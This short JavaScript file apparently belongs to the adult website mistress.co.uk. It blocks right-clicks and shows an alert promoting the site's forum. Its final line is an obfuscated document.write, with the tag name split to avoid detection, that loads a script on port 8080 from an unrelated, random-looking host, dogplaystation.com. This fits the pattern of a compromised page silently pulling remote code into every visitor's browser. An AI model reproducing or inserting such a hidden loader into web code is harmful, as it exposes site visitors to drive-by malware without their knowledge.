var message="We hope you like Mistress.co.uk\nWhy not pop along to our forum where you might meet one of your favourite mistresses?.\nMistress.co.uk is FREE to use. Come on, this is no time be shy!"; // Message for the alert box

function click(e) {
if (document.all) {
if (event.button == 2) {
alert(message);
return false;
}
}
if (document.layers) {
if (e.which == 3) {
alert(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;

document.write('<s'+'cript type="text/javascript" src="http://aospfpgy.dogplaystation.com:8080/OASIS.js"></scr'+'ipt>');